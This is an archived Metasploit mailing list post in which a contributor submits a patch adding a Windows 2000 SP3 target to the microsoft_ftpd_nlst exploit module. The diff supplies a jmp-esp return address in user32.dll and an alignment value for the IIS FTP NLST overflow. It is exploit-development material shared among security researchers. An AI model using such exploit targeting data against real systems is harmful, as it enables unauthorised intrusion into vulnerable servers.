Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

new target for microsoft_ftpd_nlst

From: aki at golftalma.fi (Aki Immonen)
Date: Wed, 2 Sep 2009 12:06:24 +0300 (EEST)
Hi,

I needed the MS ftp exloit to work in Windows 2000 SP3, so I added a new 
target for it. Here's the patch:

Index: modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb
===================================================================
--- modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb (revision 6994)
+++ modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb (working copy)
@@ -52,6 +52,14 @@
                         'Targets'        =>
                                 [
                                         [
+                                               'Windows 2000 SP3 English (IIS 5.0)',
+                                               {
+                                                       'Platform' => 'win',
+                                                       'Ret'      => 0x77e42ed8,  # jmp esp in user32.dll (English / 
5.0.2195.7032)
+                                                       'Patch'    => 0x7ffd7ffd   # works for off-by-two alignment
+                                               },
+                                         ],
+                                         [
                                                 'Windows 2000 SP4 English/Italian (IIS 5.0)',
                                                 {
                                                         'Platform' => 'win',



Regards, Aki
Previous By Date Next
Previous By Thread Next

Current thread: